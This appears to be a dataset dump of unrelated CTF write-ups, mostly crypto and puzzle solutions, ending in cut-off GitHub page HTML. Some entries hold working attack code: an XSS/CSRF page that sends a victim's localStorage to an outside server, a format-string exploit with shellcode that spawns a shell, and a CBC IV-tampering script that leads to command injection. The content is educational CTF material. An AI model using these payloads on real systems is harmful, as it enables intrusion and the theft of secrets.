text_chunk
stringlengths
151
703k
## Programming Question 3 - HackIM NullCon 2017 The given file is a repeatedly archived file in various formats. This can be found by successively running the 'file' UNIX command on it and unarchiving it based on the file command's output for the archive type. After manually running 'file' and unarchive commands based on the archival type of the file obtained for a few times, I made a list of all the archival types used, as follows:LZMA, XZ, gzip, ZPAQ, lzip, POSIX tar, bzip2 compressed data, NuFile, Zip, ARJ, 7-zip and Zoo A few of them could be unarchived using existing archival commands in UNIx. Some others like those for XZ, ZPAQ, lzip, Zoo, 7-zip and ARJ could be installed using 'brew'. The following single *brew install* was capable of unarchiving Zip, ARJ, 7-zip and Zoo.```brew install unar``` The NuFile archival format needed installation of 'nulib2' and 'nufxlib' which can be downloaded and installed from here: http://www.nulib.com/ Then I wrote the following python code to unarchive successively based on file type till an unarchived file was obtained after 254 iterations. [Python Code](https://github.com/unique-nms/nullcon-2017-hackim-prog3/blob/master/p3.py) The final file obtained was an *ASCII text* file which looked like shown below: ```total 120drwx------ 2 root root 28672 Dec 23 21:01 apt-dpkg-install-kKBLWj-rw-r--r-- 1 root root 71259 Dec 23 19:50 apt-fast.list-rw-r--r-- 1 root root 0 Dec 23 19:50 apt-fast.lock-rw-r--r-- 1 root root 0 Dec 23 21:03 secrdrwx------ 3 root root 4096 Dec 23 19:30 systemd-private-20af98806288452f91376e836938dc35-colord.service-hbUpEjdrwx------ 3 root flag 4096 Dec 23 19:30 63336C756448746861486C35634442684C565A686353467566513D3D``` Found flag string **63336C756448746861486C35634442684C565A686353467566513D3D**. This was not the flag; so I tried 'hex' decoding the string which gave the following string that looked like it was base-64 encoded:**c3ludHthaHl5cDBhLVZhcSFufQ==** Base-64 decoding the above string gave this, **synt{ahyyp0a-Vaq!n}**.This looked like the cipher text for the flag. On inspection, I predicted that the first 4 letters could be 'flag' and the substring 'ahyyp0a' could be 'nullc0n'. It was a Ceasar cipher with shift=13. Hence, the plain text and flag was: :sparkles::sparkles:**flag{nullc0n-Ind!a}**:sparkles::sparkles:
## Challenge> This time Fady learned from his old mistake and decided to use onetime pad as his encryption technique, but he never knew why people call it one time pad! > [msg](msg) ## Solution The challenge description states that Fady is using [OTP encryption](https://en.wikipedia.org/wiki/One-time_pad). As the name implies, the secret key in OTP encryption can only be used once, otherwise the complete key and plaintext can be recovered using a [many time pad attack (aka crib drag)](http://travisdazell.blogspot.nl/2012/11/many-time-pad-attack-crib-drag.html). Assuming that each line in the `msg` file is a line of text encrypted with the same OTP key, we can begin the crib drag by xor-ing 2 lines together and guessing possible letters. I used the [cribdrag tool from SpiderLabs](https://github.com/SpiderLabs/cribdrag) to recover the plaintext. ```$ python xorstrings.py 0529242a631234122d2b36697f13272c207f2021283a6b0c7908 2f28202a302029142c653f3c7f2a2636273e3f2d653e252179082a01040053321d06014e09550039011a07411f0c4d044e2d0000 $ python cribdrag.py 2a01040053321d06014e09550039011a07411f0c4d044e2d0000Your message is currently:0 __________________________Your key is currently:0 __________________________Please enter your crib:``` After a couple dozen guesses, I was able to decrypt the message as such. ```Your message is currently:0 Dear Friend, This time I uYour key is currently:0 nderstood my mistake and uPlease enter your crib:``` Now that we have some plaintext, we can recover the key by simply xoring a plaintext string together with it's corresponding ciphertext. This can be done by modifying `xorstrings.py` slightly. ```s1 = "0529242a631234122d2b36697f13272c207f2021283a6b0c7908".decode('hex')s2 = "Dear Friend, This time I u" s3 = sxor(s1, s2) print s3``` Running the modified `xorstring.py` script produces the flag: **ALEXCTF{HERE_GOES_THE_KEY}**.
# the great escape 2 (web 200) ###ENG[PL](#pl-version) We start this task in the place where we finished part 1.We have web address for `ssc.teaser.insomnihack.ch` and we have an email `[email protected]` where we can send links to be visited by our victim.What we want to extract now is the private RSA key stored in the target local storage. For this purpose we need some XSS, so we can extract the key via javascript. First XSS we found where browsing through user files via REST API at `https://ssc.teaser.insomnihack.ch/api/files.php?action=list` but this proved to be useless since the target was logged-out and also we could not upload any files for him because the credentials were changed, compared to what was available in pcap. But we figured that maybe there is a similar vulnerability in a different REST endpoint, and in fact there was one, in the current user endpoint at `https://ssc.teaser.insomnihack.ch/api/user.php?action=getUser`. The vuln in both cases was that this page was rendered as HTML and not as JSON, and therefore username with HTML tags would get them rendered on this page.On top of that registering new user with POST request would actually redirect to this page automatically! So we had to get the target to enter our webpage, where we can perform CSRF request registering new user on `ssc` website, and place javascript stealing the local storage contents in the username. There are some limitations to what we can pass as parameters here so we had to encode the payload via: ```pythonreal = '''<script>var data = ''for (var key in localStorage){ data += localStorage.getItem(key)}var http = new XMLHttpRequest();http.open("POST", "https://xss.p4.team/index.php", true);http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");http.send("data=" + data);</script>'''payload = "".format(','.join([str(ord(c)) for c in real]))``` And the whole resulting attack page was: ```html<html> <form id="1234" action="https://ssc.teaser.insomnihack.ch/api/user.php" method="post"> <input name="action" value="login" ></input><input name="name" value="<img src=/ onerror=javascript:document.write(String.fromCharCode(10,32,32,32,32,60,115,99,114,105,112,116,62,10,32,32,32,32,118,97,114,32,100,97,116,97,32,61,32,39,39,10,32,32,32,32,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,108,111,99,97,108,83,116,111,114,97,103,101,41,123,10,32,32,32,32,32,32,32,32,100,97,116,97,32,43,61,32,108,111,99,97,108,83,116,111,114,97,103,101,46,103,101,116,73,116,101,109,40,107,101,121,41,10,32,32,32,32,125,10,32,32,32,32,118,97,114,32,104,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,10,32,32,32,32,104,116,116,112,46,111,112,101,110,40,34,80,79,83,84,34,44,32,34,104,116,116,112,115,58,47,47,120,115,115,46,112,52,46,116,101,97,109,47,105,110,100,101,120,46,112,104,112,34,44,32,116,114,117,101,41,59,10,32,32,32,32,104,116,116,112,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,116,121,112,101,34,44,32,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,59,10,32,32,32,32,104,116,116,112,46,115,101,110,100,40,34,100,97,116,97,61,34,32,43,32,100,97,116,97,41,59,10,32,32,32,32,60,47,115,99,114,105,112,116,62,10,32,32,32,32));>"> <input name="password" value="aa"> </form></html> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script><script type="text/javascript"> $(document).ready(function() { window.document.forms[0].submit(); });</script>``` Once the target got on this webpage he would register a user with our javascript payload, get redirected to result page with script executed and the local storage contents would get sent to our server.This way we extracted the RSA private key to decode binary for stage 3 and the flag `INS{IhideMyVulnsWithCrypto}` ###PL version Zaczynamy tam gdzie zakończylismy analizę części 1.Mamy adres strony `ssc.teaser.insomnihack.ch` oraz mail `[email protected]` gdzie możemy wysyłać linki do odwiedzenia przez naszą ofiarę.Chcemy teraz wyciągnąć prywatny klucz RSA z local storage przeglądarki ofiary. Do tego potrzeba nam podatności XSS, żeby wyciągnąć dane za pomocą javascriptu. Pierwszy XSS jaki znaleźliśmy znajdował się w listingu plików za pomocą REST API pod `https://ssc.teaser.insomnihack.ch/api/files.php?action=list` ale to okazało się bezużyteczne, bo ofiara była wylogowana oraz nie mogliśmy dodać żadnych plików dla ofiary bo login i hasło uległy zmianie w porównaniu do tych z pcapa. Ale uznaliśmy, że może jest drugi podobny błąd w innym endpoincie REST i faktycznie był kolejny podczas wyświetlania aktualnie zalogowanego użytkownika pod `https://ssc.teaser.insomnihack.ch/api/user.php?action=getUser`. Podatność polegała w obu sytuacjach na tym, że strona wynikowa była renderowana jako HTML a nie jako JSON, więc jeśli login zawierałby jakieś tagi HTML to te zostałyby wyrenderowane na stronie.Ponaddto rejestracja nowego użytkownika żądaniem POST automatycznie przenosiła nas na tą stronę z wynikiem logowania. Musieliśmy teraz podstawić ofierze naszą stronę, na której za pomocą żądania CSRF zarejestrowalibyśmy nowego użytkownika w serwisie `ssc` a w jego loginie umieścilibyśmy javascript kradnący zawartość local storage. Były pewne ograniczenia na to co można było przekazać jako parametry więc payload był kodowany przez: ```pythonreal = '''<script>var data = ''for (var key in localStorage){ data += localStorage.getItem(key)}var http = new XMLHttpRequest();http.open("POST", "https://xss.p4.team/index.php", true);http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");http.send("data=" + data);</script>'''payload = "".format(','.join([str(ord(c)) for c in real]))``` A cała utworzona strona ataku: ```html<html> <form id="1234" action="https://ssc.teaser.insomnihack.ch/api/user.php" method="post"> <input name="action" value="login" ></input><input name="name" value="<img src=/ onerror=javascript:document.write(String.fromCharCode(10,32,32,32,32,60,115,99,114,105,112,116,62,10,32,32,32,32,118,97,114,32,100,97,116,97,32,61,32,39,39,10,32,32,32,32,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,108,111,99,97,108,83,116,111,114,97,103,101,41,123,10,32,32,32,32,32,32,32,32,100,97,116,97,32,43,61,32,108,111,99,97,108,83,116,111,114,97,103,101,46,103,101,116,73,116,101,109,40,107,101,121,41,10,32,32,32,32,125,10,32,32,32,32,118,97,114,32,104,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,10,32,32,32,32,104,116,116,112,46,111,112,101,110,40,34,80,79,83,84,34,44,32,34,104,116,116,112,115,58,47,47,120,115,115,46,112,52,46,116,101,97,109,47,105,110,100,101,120,46,112,104,112,34,44,32,116,114,117,101,41,59,10,32,32,32,32,104,116,116,112,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,116,121,112,101,34,44,32,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,59,10,32,32,32,32,104,116,116,112,46,115,101,110,100,40,34,100,97,116,97,61,34,32,43,32,100,97,116,97,41,59,10,32,32,32,32,60,47,115,99,114,105,112,116,62,10,32,32,32,32));>"> <input name="password" value="aa"> </form></html> <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script><script type="text/javascript"> $(document).ready(function() { window.document.forms[0].submit(); });</script>``` Kiedy cel wszedł na stronę, zarejestrował użytkownika z javascriptem w loginie, został przekierowany na stronę wyników, skrypt się wykonał i na nasz serwer wysłana została zawartość local storage.W ten sposób uzyskaliśmy klucz prywatny RSA do odszyfrowania binarki dla poziomu 3 oraz flagę `INS{IhideMyVulnsWithCrypto}`
# Web1, Web, 100pts ## Problem Chris Martin wants to go home. Can you help him get there as soon as possible? http://54.152.19.210/web100/ ## Solution We get simple page with login form. When I've tried to login, message about some strange error occured: ![web1](assets/web1_1.png)Also, in the HTML source, there was Base64 string hidden at the bottom of the page: ![web1](assets/web1_3.png) Time to collect all the crumbs together: - Chris Martin (from challenge description) is co-founder and a lead of Coldplay band- we have to help him to get home- there is (probably) a table in database where hostname and IP are logged First, I've tried classic SQL Injection in login form. It did not work and nothing really changed. So I decided to focus on words from error message - __host__ and __IP__. Chris wanted to go home. And as we know... ![web1](assets/localhost.png)(source: https://images5.alphacoders.com/426/426359.png) :) When I've added __X-Forwarder-For__ HTTP request header with value 127.0.0.1, an error message did not appear. It was a good sign. ```POST /web100/ HTTP/1.1Host: 54.152.19.210Content-Length: 27Cache-Control: max-age=0Origin: http://54.152.19.210Upgrade-Insecure-Requests: 1User-Agent: StackX-Forwarded-For: 127.0.0.1Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Referer: http://54.152.19.210/web100/Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4Connection: close``` But still username and password was left to find. Decoded Base64 string contains MD5 hash: 2b4b037fd1f30375e5cd871448b5b95c. When I've tried to look for it in Google hoping it is already cracked password, the only thing I found was this: ![web1](assets/2b4b037fd1f30375e5cd871448b5b95c.png) All results were just links to XML with list of songs. However, those links also contained reference to 'Coldplay - Paradise' album name. It just could not be accident. Indeed, __coldplay__ as username and __paradise__ as password allows to get the flag and send Chris home: ![web1](assets/web1_2.png)
Challenge: Crypto Question 2 |----------------------------------------Category: Cryptography |----------------------------------------350 points |---------------------------------------- ```Description: Breaking Bad Key ExchangeHint 1 : in the range (1 to g*q), there are couple of pairs yielding common secrete as 399.Hint 2 : 'a' and 'b' both are less than 1000.Flag Format: flag{a,b}``` My code is naughty !!!!! ```python#!/usr/bin/env python q=541g=10 a=[]b=[] for x in range(1000): if g**x % q == 298: a.append(x)for y in range(1000): if g**y % q == 330: b.append(y) print "flag{"+str(a)+","+str(b)+"}" # flag{[170, 710],[268, 808]} Combination of the code on the site to get the flag. flag{170,808} ```
# BsidesSF 2017 - Delphi-Status (web, 250 pts) Although it was in the web category, it was more of a crypto challenge. It's a web app that allows you to click links which are obvisouly running system commands: ![N|Solid](https://i.imgur.com/skpPMdC.png) The vulnerability can be exploited like a classic padding oracle. However, team [TheGoonies](https://thegoonies.rocks) took another approach to solve it. When clicking on the "echo something" link, the requests looks like the following:```GET /execute/dc929db8d583f79becbfe00f6fe17e3680aef7b95a28afa7b314966442373f32f0da179bd12f5f676a5c896bda6f4673fb23f86d2efcb65ebd4892d7ba2b243cfecff573589ebf4ea3cec3f039c6c4a0595912c953a4f8e517c667eaba67800b914db22da7aae0c1cacf22790ed03949```Which returns: **This is a longer string that I want to use to test multiple-block patterns** We quickly determine that the length of the ciphertext in the request equals exactly 7 blocks of 16 bytes.However the command line `echo "the_text"` is only 81 bytes, so the IV must be preprended to the command. What happens if we modify some of the first 16 bytes? We would modify the IV without breaking the actual decryption. For example, let's try and change the 9th byte. This should correspond to the letter `i` in `echo "This is...`. So we will change \xec to \x00: ```GET /execute/dc929db8d583f79b00bfe00f6fe17e3680aef7b95a28afa7b314966442373f32f0da179bd12f5f676a5c896bda6f4673fb23f86d2efcb65ebd4892d7ba2b243cfecff573589ebf4ea3cec3f039c6c4a0595912c953a4f8e517c667eaba67800b914db22da7aae0c1cacf22790ed03949```That returns: **Th\x85s is a longer string that I want to use to test multiple-block patterns** What does it tell us? That if we want to include an arbitrary character X in the decrypted text, we just have to XOR X with \x85! Let's confirm that by trying to include the letter 'A' in the output text. We will change the 8th byte to `\x41 ^ \x85` (\xc4): ```GET /execute/dc929db8d583f79bc4bfe00f6fe17e3680aef7b95a28afa7b314966442373f32f0da179bd12f5f676a5c896bda6f4673fb23f86d2efcb65ebd4892d7ba2b243cfecff573589ebf4ea3cec3f039c6c4a0595912c953a4f8e517c667eaba67800b914db22da7aae0c1cacf22790ed03949```Response: **ThAs is a longer string that I want to use to test multiple-block patterns** We're on track! So let's repeat that process for a length of 8 bytes (bytes 9 to 16). We use the simple script below, but it's easily done manually. ```pythonblock_1 = 'dc929db8d583f79b'block_2 = '00' * 8other_blocks = '80aef7b95a28afa7b314966442373f32f0da179bd12f5f676a5c896bda6f4673fb23f86d2efcb65ebd4892d7ba2b243cfecff573589ebf4ea3cec3f039c6c4a0595912c953a4f8e517c667eaba67800b914db22da7aae0c1cacf22790ed03949'res = requests.get('http://delphi-status-e606c556.ctf.bsidessf.net/execute/%s' % block_1 + block_2 + other_blocks).content decrypted_block = res[7:15]sys.stdout.write(decrypted_block)``````$ python script.py | xxd00000000: 85cc c066 1cc1 1f16``` So we know that the decrypted block when xored with zeros is `\x85\xcc\xc0\x66\x1c\xc1\x1f\x16`, which mean we can control 8 bytes of decrypted text. Lucky for us, it's enough to create a payload that will let us execute commands! we can use the back ticks to escape from the `echo` and run arbitrary commands. Finally, we can solve the challenge like this: ```python# Note: the argument must be exacly 6 bytes, + 2 backticksassert len(sys.argv[1]) == 6payload = '`%s`' % sys.argv[1]decrypted_block = '\x85\xcc\xc0\x66\x1c\xc1\x1f\x16' block_1 = 'dc929db8d583f79b'other_blocks = '80aef7b95a28afa7b314966442373f32f0da179bd12f5f676a5c896bda6f4673fb23f86d2efcb65ebd4892d7ba2b243cfecff573589ebf4ea3cec3f039c6c4a0595912c953a4f8e517c667eaba67800b914db22da7aae0c1cacf22790ed03949' x = xor(decrypted_block, payload).encode('hex')print requests.get('http://delphi-status-e606c556.ctf.bsidessf.net/execute/%s' % block_1 + x + other_blocks).content```File listing:```$ python script.py "ls -l"Thtotal 16-rw-r--r-- 4 root root 71 Feb 12 03:11 Gemfile-rw-r--r-- 4 root root 329 Feb 12 03:11 Gemfile.lock-rw-r--r-- 4 root root 1746 Feb 12 03:11 app.rb-rw-r--r-- 4 root root 38 Feb 12 03:11 flag.txtlonger string that I want to use to test multiple-block patterns```Get the flag:```$ python script.py "cat f*"ThFLAG:a1cf81c5e0872a7e0a4aec2e8e9f74c3longer string that I want to use to test multiple-block patterns```
#!/usr/bin/env python from pwn import *import sys # nullcon HackIM CTF - 2017# Task: Exploitation Question 1 - 200 pts# Author: Simone Ferrini def choose(r, c): r.sendline(c) def insert(r): choose(r, '1') r.sendline("\x90"*8 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80") r.recvuntil('Enter book id:') r.sendline('1') def leak(r): choose(r, '3') r.recvuntil('Enter query: ') r.sendline("%7$p") return r.recvline()[16:-1] def pwn(r, l): choose(r, '3') r.recvuntil('Enter query: ') high = int(l[2:-4], 16) low = int(l[5:], 16) high = high - (4 + 4) low = low - high putchar_got = 0x0804b038 got_to_override = putchar_got r.sendline(p32(got_to_override) + p32(got_to_override + 2) + "%" + str(high) + "x%12$hn" + "%" + str(low) + "x%11$hn") def exploit(r): insert(r) pwn(r, leak(r)) r.interactive() if __name__ == "__main__": log.info("For remote: %s HOST PORT" % sys.argv[0]) if len(sys.argv) > 1: r = remote(sys.argv[1], int(sys.argv[2])) exploit(r) else: r = process(['level1.bin']) print util.proc.pidof(r) pause() exploit(r)
# angrybird (RE 125) ###ENG We are faced with x64 ELF binary. Binary is obviously corrupted - it exits right at the beginning. Unfortunatelly I don't have non-patched binary anymore,but I had to NOP a lot of code at the beginning: ```asm55 push rbp48 89 E5 mov rbp, rsp48 83 C4 80 add rsp, 0FFFFFFFFFFFFFF80h64 48 8B 04 25 28+mov rax, fs:28h48 89 45 F8 mov [rbp+var_8], rax90 nop90 nop90 nop90 nop90 nop90 nop90 nop90 nop90 nop90 nop90 nop48 C7 45 90 18 60+mov [rbp+var_70], offset strncmpp48 C7 45 98 20 60+mov [rbp+var_68], offset putsp48 C7 45 A0 28 60+mov [rbp+var_60], offset stack_chk_fail48 C7 45 A8 38 60+mov [rbp+var_58], offset startmainB8 00 00 00 00 mov eax, 0E8 4B FF FF FF call should_return_2189 45 8C mov [rbp+n], eaxB8 00 00 00 00 mov eax, 090 nop90 nop90 nop90 nop90 nopB8 00 00 00 00 mov eax, 0``` And patch function `should return 21` (because according to debug string, it should return 21): ```asm should_return_21 proc near55 push rbp48 89 E5 mov rbp, rspBF 64 50 40 00 mov edi, offset s ; "you should return 21 not 1 :("E8 8C FE FF FF call _puts8B 05 56 59 20 00 mov eax, cs:const_15D pop rbpC3 retn should_return_21 endp``` Now binary is working correctly: it reads flag, and does a lot of checks, one char at a time: ![](./screen1.png) This looks easy enough, right?Well, let's zoom out: ![](./screen2.png) Wait, what? Let's zoom out even more: ![](./screen3.png) `O_o`. Ok, we might need to do this more intelligently. Turns out that if you think hard enough, everything is trivial. Or maybe just angr creators are genius, I don't know.Anyway, I created this very basic angr script (my second angr experience ever): ```pythonimport angr main = 0x4007DAfind = 0x404FABfind = 0x404FC1avoid = [0x400590] p = angr.Project('./angrybird2')init = p.factory.blank_state(addr=main)pg = p.factory.path_group(init, threads=8)ex = pg.explore(find=find, avoid=avoid) final = ex.found[0].stateflag = final.posix.dumps(0) print("Flag: {0}".format(final.posix.dumps(1)))``` And, just like that, it worked (almost) first time and shown the flag: ```╭─msm@mercury /home/msm/codegate2017 ‹system›╰─$ python angrdo.pyWARNING | 2017-02-13 19:40:46,155 | simuvex.plugins.symbolic_memory | Concretizing symbolic length. Much sad; think about implementing.Flag: you typed : Im_so_cute&pretty_:) @ @@```
Challenge: NOP |----------------------------------------Category: Misc |----------------------------------------20 points |---------------------------------------- ```Description: x86's NOP is actually another instruction. What is the Intel syntax representation of the assembly of the other instruction? Include a space between operands, if applicable.``````Flag = XCHG EAX, EAX```
Challenge: Easycap ----------------------------------------Category: Forensic ----------------------------------------40 points ---------------------------------------- ```Description: Can you get the flag from the packet capture? File: easycap.pcap``` ```Click and Follow Flux TCP (Follow TCP stream)``` ```FLAG:385b87afc8671dee07550290d16a8071```
# Sherlock (crypto) ```Sherlock has a mystery in front of him. Help him to find the flag. ``` ###ENG[PL](#pl-version) In the task we get a [book](sherlock.txt).We figured we could compare it to the [original text from Project Gutenberg](sherlock_orig.txt). We had to make it lowercase and remove the ToC but other than that the comparison was simple: ```pythonimport codecs def main(): with codecs.open("sherlock.txt", "r") as input_file: task_data = input_file.read() task_data.replace("\n\n", "\n") with codecs.open("sherlock.txt", "r") as input_file: original_data = input_file.read() original_data = original_data.lower() original_data.replace("\n\n", "\n") result = "".join([task_data[i] for i in range(len(task_data)) if task_data[i] != original_data[i]]) print(result) main()``` This gave us a long string with `ZEROONEZERO...`.We changed this into a number and interpreted as text: ```pythonfrom crypto_commons.generic import long_to_bytes result = result.replace("ZERO", "0") result = result.replace("ONE", "1") print(long_to_bytes(int(result, 2)))``` And we got `BITSCTF{h1d3_1n_pl41n_5173}` ###PL version W zadaniu dostajemy [książkę](sherlock.txt).Postanowiliśmy porównać ją z [oryginalnym tekstem z Project Gutenberg](sherlock_orig.txt). Musieliśmy zmienić ją na lowercase i usunąć spis treści, ale cała reszta była prosta: ```pythonimport codecs def main(): with codecs.open("sherlock.txt", "r") as input_file: task_data = input_file.read() task_data.replace("\n\n", "\n") with codecs.open("sherlock.txt", "r") as input_file: original_data = input_file.read() original_data = original_data.lower() original_data.replace("\n\n", "\n") result = "".join([task_data[i] for i in range(len(task_data)) if task_data[i] != original_data[i]]) print(result) main()``` To dało nam długi string `ZEROONEZERO...`.Po zmianie tego na liczbę a następnie zinterpretowaniu jako tekst: ```pythonfrom crypto_commons.generic import long_to_bytes result = result.replace("ZERO", "0") result = result.replace("ONE", "1") print(long_to_bytes(int(result, 2)))``` Dostaliśmy `BITSCTF{h1d3_1n_pl41n_5173}`
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" /> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" 